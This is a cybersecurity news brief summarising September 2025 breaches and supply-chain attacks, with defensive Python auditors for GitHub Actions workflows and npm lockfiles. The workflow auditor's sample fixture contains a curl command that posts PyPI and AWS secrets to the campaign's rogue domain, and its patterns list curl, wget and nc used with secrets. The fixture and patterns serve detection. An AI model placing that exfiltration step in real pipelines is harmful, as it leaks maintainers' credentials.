Svoboda Cybersecurity Brief September 09, 2025

Sep 09, 2025


Vietnam’s National Credit Agency Breach Exposes 160M Records

Hackers associated with ShinyHunters breached Vietnam’s National Credit Information Center (CIC), exfiltrating 160 million records containing PII, credit data, military IDs, and financial records. The attack exploited an n-day vulnerability in end-of-life (EOL) software that no longer receives vendor patches; no ransom was demanded.
Source: DataBreaches.net

GhostAction GitHub Attack Compromises 3,325 Secrets Across 817 Repositories

A supply chain attack dubbed GhostAction injected malicious GitHub Actions workflows to steal PyPI, npm, DockerHub, and AWS credentials. The injected workflow read the repositories’ secrets and exfiltrated them via HTTP POST to a rogue domain (bold-dhawan.45-139-104-115.plesk.page). At least 9 npm and 15 PyPI packages remain at risk.
Impact: Unauthorized access to CI/CD pipelines and potential package tampering.
Mitigation: Rotate exposed secrets, audit workflows for unexpected network destinations and secret usage, pin third-party actions to commit SHAs, and enforce MFA for maintainers.
Source: BleepingComputer
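The workflow audit recommended above can be automated. The script below is an added example, not code from the original brief or from BleepingComputer’s reporting; it scans the text of a GitHub Actions workflow for three GhostAction-style signals: URLs whose host is outside an expected allowlist, network commands (curl, wget, and similar) that reference a secret directly or through an `env:` variable populated from `${{ secrets.* }}`, and third-party actions not pinned to a full commit SHA. The allowlist and the sample workflow are constructed for the example; the rogue domain in the sample is the one named in the report.

```python
import re
from urllib.parse import urlparse

# Hosts a build job is normally expected to contact. Assumption: tune per organization.
ALLOWED_HOSTS = {
    "github.com", "api.github.com", "objects.githubusercontent.com",
    "registry.npmjs.org", "pypi.org", "upload.pypi.org",
    "files.pythonhosted.org", "index.docker.io", "registry-1.docker.io",
}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
NET_TOOL_RE = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
SECRET_EXPR_RE = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
# "NAME: ${{ secrets.X }}" inside an env: block maps a secret onto a shell variable.
ENV_FROM_SECRET_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*:\s*\$\{\{\s*secrets\.")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^@\s]+)@(\S+)")
FULL_SHA_RE = re.compile(r"[0-9a-f]{40}")


def audit_workflow(text):
    """Return (line_no, finding, detail) tuples for one workflow file's text."""
    lines = text.splitlines()

    # Pass 1: collect shell variable names that are fed from repository secrets.
    secret_vars = set()
    for line in lines:
        m = ENV_FROM_SECRET_RE.match(line)
        if m:
            secret_vars.add(m.group(1))
    var_ref_re = None
    if secret_vars:
        names = "|".join(re.escape(v) for v in sorted(secret_vars))
        # Matches $NAME or ${NAME} but not a longer identifier sharing the prefix.
        var_ref_re = re.compile(r"\$\{?(" + names + r")(?![A-Za-z0-9_])")

    # Pass 2: flag suspicious lines.
    findings = []
    for no, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                findings.append((no, "unexpected-host", host))
        uses_secret = SECRET_EXPR_RE.search(line) or (var_ref_re and var_ref_re.search(line))
        if NET_TOOL_RE.search(line) and uses_secret:
            findings.append((no, "secret-in-network-command", line.strip()))
        m = USES_RE.match(line)
        if m and not FULL_SHA_RE.fullmatch(m.group(2)):
            findings.append((no, "unpinned-action", f"{m.group(1)}@{m.group(2)}"))
    return findings


# Constructed sample: a benign build plus a GhostAction-style exfiltration step.
SAMPLE_WORKFLOW = """\
name: Github Actions Security
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install deps
        run: pip install -r requirements.txt
      - name: Publish
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        run: |
          curl -s -X POST https://bold-dhawan.45-139-104-115.plesk.page/ -d "pypi=$PYPI_TOKEN&aws=$AWS_ACCESS_KEY_ID"
          curl -s https://api.github.com/repos/example/repo
"""

if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

Run it over every file under `.github/workflows/` in each repository; a hit on `unexpected-host` or `secret-in-network-command` in a workflow nobody remembers adding is the pattern this campaign used. The two-pass design matters because the injected workflows copied secret names into an `env:` block and then used the plain shell variables in the curl command, so a check that only looks for `${{ secrets.* }}` on the same line as curl misses them.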

Salesloft GitHub Breach Led to Salesforce OAuth Token Theft

UNC6395 compromised Salesloft’s GitHub account (March–June 2025), which led to the theft of Drift OAuth tokens that the attackers then used to access customers’ Salesforce data. Within that data they hunted for AWS keys, Snowflake tokens, and credentials left in support tickets across 700+ organizations, including Google and Zscaler.
Source: The Hacker News

Cisco ASA Devices Targeted in Mass Scanning Campaign

GreyNoise observed 25,000+ IPs scanning Cisco ASA devices for vulnerabilities, with 80% of the traffic coming from a Brazilian botnet. The activity is consistent with pre-exploitation reconnaissance ahead of a zero-day or exploitation of unpatched flaws.
Impact: Potential exploitation of Cisco ASA vulnerabilities.
Mitigation: Patch ASA devices, block the scanning IPs, and restrict external access to WebVPN and the Telnet/SSH management interfaces.
Source: BleepingComputer

NPM Supply Chain Attack Hijacks Packages with 2B Weekly Downloads

Attackers phished a maintainer from the lookalike domain npmjs.help (support@npmjs.help) and used the stolen account to push malware-laden updates to 18 popular packages (e.g., debug, chalk). The malware hijacks crypto transactions by rewriting wallet addresses in real time.
Impact: Browser-based financial theft for Ethereum, Bitcoin, and Solana users.
Mitigation: Verify package integrity, pin dependencies with lockfiles and review any version drift, and monitor for anomalous transactions.
Source: KrebsOnSecurity
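The lockfile and integrity checks in the mitigation can be scripted. The code below is an added example, not from the original brief or from the npm project; it audits a `package-lock.json` (lockfileVersion 2 or 3) for packages missing an `integrity` field, packages resolved from a registry other than the expected one, and versions that differ from an organization-maintained allowlist, and it verifies a downloaded tarball against the SRI `sha512-` value npm records. The lockfile, the pinned allowlist and the tarball bytes are constructed for the example; the versions are sample values and are not claims about which releases were affected.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import urlparse


def sri_sha512(data: bytes) -> str:
    """Subresource-Integrity string in the form npm writes to package-lock.json."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


def verify_integrity(data: bytes, integrity: str) -> bool:
    """True only if the tarball bytes hash to the recorded sha512 integrity value."""
    if not integrity.startswith("sha512-"):
        return False
    return hmac.compare_digest(sri_sha512(data), integrity)


def audit_lockfile(lock_text: str, pinned: dict, registry_host: str = "registry.npmjs.org"):
    """Return (package, finding, detail) tuples for a lockfileVersion 2/3 package-lock.json."""
    lock = json.loads(lock_text)
    findings = []
    for key, entry in lock.get("packages", {}).items():
        if key == "" or entry.get("link"):
            continue  # root project or workspace symlink, not a registry artifact
        name = key.rsplit("node_modules/", 1)[-1]  # handles nested node_modules paths
        version = entry.get("version", "")
        resolved = entry.get("resolved", "")
        host = (urlparse(resolved).hostname or "").lower()
        if host != registry_host:
            findings.append((name, "unexpected-registry", host or resolved))
        if "integrity" not in entry:
            findings.append((name, "missing-integrity", version))
        if name not in pinned:
            findings.append((name, "not-in-allowlist", version))
        elif pinned[name] != version:
            findings.append((name, "version-drift", f"{pinned[name]} -> {version}"))
    return findings


# Constructed sample data (hypothetical allowlist and lockfile, stand-in tarball bytes).
CHALK_TARBALL = b"constructed stand-in for chalk-5.3.0.tgz"
PINNED = {"chalk": "5.3.0", "debug": "4.3.7", "ms": "2.1.3", "ansi-styles": "6.2.0"}
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"chalk": "5.3.0", "debug": "4.3.7"}},
        "node_modules/chalk": {
            "version": "5.3.0",
            "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.0.tgz",
            "integrity": sri_sha512(CHALK_TARBALL),
        },
        "node_modules/debug": {  # integrity field missing
            "version": "4.3.7",
            "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz",
        },
        "node_modules/ms": {  # resolved from an unexpected host
            "version": "2.1.3",
            "resolved": "https://mirror.example.invalid/ms/-/ms-2.1.3.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/ansi-styles": {  # newer than the reviewed version
            "version": "6.2.1",
            "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz",
            "integrity": "sha512-BBBB",
        },
    },
})

if __name__ == "__main__":
    for finding in audit_lockfile(SAMPLE_LOCK, PINNED):
        print(finding)
    print("chalk tarball ok:", verify_integrity(CHALK_TARBALL, json.loads(SAMPLE_LOCK)["packages"]["node_modules/chalk"]["integrity"]))
```

After an incident like this, freeze the allowlist at the last versions reviewed before the compromise window and treat every `version-drift` as a change that needs a human look, since `npm install` with a caret range will otherwise pull a poisoned patch release silently. The integrity value is only as good as the tarball it was first computed from, so compute it from a copy you have inspected rather than trusting whatever the registry served on the day of the attack.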

GPUGate Malware Evades Detection Using GPU-Based Decryption

A campaign targeting IT firms in Western Europe delivers malware via Google Ads that lead to a spoofed GitHub commit page. The payload is shipped encrypted and its decryption routine runs on the GPU, so it never decrypts in sandboxes and analysis VMs that lack a real GPU; once running it drops PowerShell scripts for persistence.
Impact: Data exfiltration and secondary payload deployment.
Mitigation: Block gitpage[.]app and enforce application allowlisting.
Source: The Hacker News

Lovesac Confirms RansomHub Ransomware Attack

The furniture retailer Lovesac disclosed a February 2025 breach by RansomHub that exposed employee and customer PII. The company did not confirm whether a ransom was paid.
Source: BleepingComputer

Signal Launches E2E Encrypted Cloud Backups

Signal’s new backup feature encrypts chats under a 64-character recovery key that only the user holds, with paid tiers offering 100GB of storage. Media is retained for 45 days by default.
Source: BleepingComputer

CISA Delays Critical Infrastructure Cyber Reporting Rule to 2026

CISA postponed the CIRCIA rule mandating 72-hour incident reporting for critical infrastructure to May 2026, citing regulatory adjustments.
Source: DataBreaches.net

Wealthsimple Discloses Supply Chain Breach Affecting 1% of Users

A compromised third-party software package exposed Social Insurance Numbers (SINs), bank details, and government IDs for fewer than 1% of Wealthsimple’s customers. No funds were stolen.
Source: SecurityWeek
